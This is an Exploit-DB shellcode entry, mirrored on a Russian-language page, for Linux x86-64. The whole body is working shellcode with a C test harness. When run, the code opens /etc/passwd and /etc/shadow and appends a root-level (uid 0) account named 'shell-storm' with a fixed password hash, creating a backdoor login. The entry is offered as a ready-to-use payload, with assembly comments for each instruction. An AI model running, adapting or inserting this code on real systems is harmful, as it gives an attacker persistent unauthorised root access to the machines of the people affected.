- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13943
- Проверка EDB
-
- Пройдено
- Автор
- JONATHAN SALWAN
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86-64
- CVE
- N/A
- Дата публикации
- 2010-06-20
C:
/*
Title: Linux/x86-64 - Add root user with password - 390 bytes
Date: 2010-06-20
Tested: Archlinux x86_64 k2.6.33
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
Add root user with password:
- User: shell-storm
- Pass: leet
- id : 0
*/
#include <stdio.h>
char *SC =
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 01204) */
"\x48\xbb\xff\xff\xff\xff\xff\x73\x77\x64" /* mov $0x647773ffffffffff,%rbx */
"\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73" /* mov $0x7361702f6374652f,%rbx */
"\x53" /* push %rbx */
"\x48\x89\xe7" /* mov %rsp,%rdi */
"\x66\xbe\x41\x04" /* mov $0x441,%si */
"\x66\xba\x84\x02" /* mov $0x284,%dx */
"\x48\x31\xc0" /* xor %rax,%rax */
"\xb0\x02" /* mov $0x2,%al */
"\x0f\x05" /* syscall */
/* write(3, "shell-storm:x:0:0:shell-storm.or"..., 46) */
"\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
"\x48\xc1\xef\x38" /* shr $0x38,%rdi */
"\x48\xbb\xff\xff\x2f\x62\x61\x73\x68\x0a" /* mov $0xa687361622fffff,%rbx */
"\x48\xc1\xeb\x10" /* shr $0x10,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x67\x3a\x2f\x3a\x2f\x62\x69\x6e" /* mov $0x6e69622f3a2f3a67,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x73\x74\x6f\x72\x6d\x2e\x6f\x72" /* mov $0x726f2e6d726f7473,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x30\x3a\x73\x68\x65\x6c\x6c\x2d" /* mov $0x2d6c6c6568733a30,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x6f\x72\x6d\x3a\x78\x3a\x30\x3a" /* mov $0x3a303a783a6d726f,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x73\x68\x65\x6c\x6c\x2d\x73\x74" /* mov $0x74732d6c6c656873,%rbx */
"\x53" /* push %rbx */
"\x48\x89\xe6" /* mov %rsp,%rsi */
"\x48\xba\xff\xff\xff\xff\xff\xff\xff\x2e" /* mov $0x2effffffffffffff,%rdx */
"\x48\xc1\xea\x38" /* shr $0x38,%rdx */
"\x48\x31\xc0" /* xor %rax,%rax */
"\xb0\x01" /* mov $0x1,%al */
"\x0f\x05" /* syscall */
/* close(3) */
"\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
"\x48\xc1\xef\x38" /* shr $0x38,%rdi */
"\x48\x31\xc0" /* xor %rax,%rax */
"\xb0\x03" /* mov $0x3,%al */
"\x0f\x05" /* syscall */
/* Xor */
"\x48\x31\xdb" /* xor %rbx,%rbx */
"\x48\x31\xff" /* xor %rdi,%rdi */
"\x48\x31\xf6" /* xor %rsi,%rsi */
"\x48\x31\xd2" /* xor %rdx,%rdx */
/* open("/etc/shadow", O_WRONLY|O_CREAT|O_APPEND, 01204) */
"\x48\xbb\xff\xff\xff\xff\xff\x64\x6f\x77" /* mov $0x776f64ffffffffff,%rbx */
"\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x2f\x65\x74\x63\x2f\x73\x68\x61" /* mov $0x6168732f6374652f,%rbx */
"\x53" /* push %rbx */
"\x48\x89\xe7" /* mov %rsp,%rdi */
"\x66\xbe\x41\x04" /* mov $0x441,%si */
"\x66\xba\x84\x02" /* mov $0x284,%dx */
"\x48\x31\xc0" /* xor %rax,%rax */
"\xb0\x02" /* mov $0x2,%al */
"\x0f\x05" /* syscall *
/* write(3, "shell-storm:$1$reWE7GM1$axeMg6LT"..., 59) */
"\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
"\x48\xc1\xef\x38" /* shr $0x38,%rdi */
"\x48\xbb\xff\xff\xff\xff\xff\x3a\x3a\x0a" /* mov $0xa3a3affffffffff,%rbx */
"\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x34\x37\x37\x38\x3a\x3a\x3a\x3a" /* mov $0x3a3a3a3a38373734,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x5a\x30\x55\x33\x4d\x2f\x3a\x31" /* mov $0x313a2f4d3355305a,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x73\x2f\x50\x64\x53\x67\x63\x46" /* mov $0x4663675364502f73,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x61\x78\x65\x4d\x67\x36\x4c\x54" /* mov $0x544c36674d657861,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x65\x57\x45\x37\x47\x4d\x31\x24" /* mov $0x24314d4737455765,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x6f\x72\x6d\x3a\x24\x31\x24\x72" /* mov $0x722431243a6d726f,%rbx */
"\x53" /* push %rbx */
"\x48\xbb\x73\x68\x65\x6c\x6c\x2d\x73\x74" /* mov $0x74732d6c6c656873,%rbx */
"\x53" /* push %rbx */
"\x48\x89\xe6" /* mov %rsp,%rsi */
"\x48\xba\xff\xff\xff\xff\xff\xff\xff\x3b" /* mov $0x3bffffffffffffff,%rdx */
"\x48\xc1\xea\x38" /* shr $0x38,%rdx */
"\x48\x31\xc0" /* xor %rax,%rax */
"\xb0\x01" /* mov $0x1,%al */
"\x0f\x05" /* syscall */
/* close(3) */
"\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
"\x48\xc1\xef\x38" /* shr $0x38,%rdi */
"\x48\x31\xc0" /* xor %rax,%rax */
"\xb0\x03" /* mov $0x3,%al */
"\x0f\x05" /* syscall */
/* _exit(0) */
"\x48\x31\xff" /* xor %rdi,%rdi */
"\x48\x31\xc0" /* xor %rax,%rax */
"\xb0\x3c" /* mov $0x3c,%al */
"\x0f\x05"; /* syscall */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}
- Источник
- www.exploit-db.com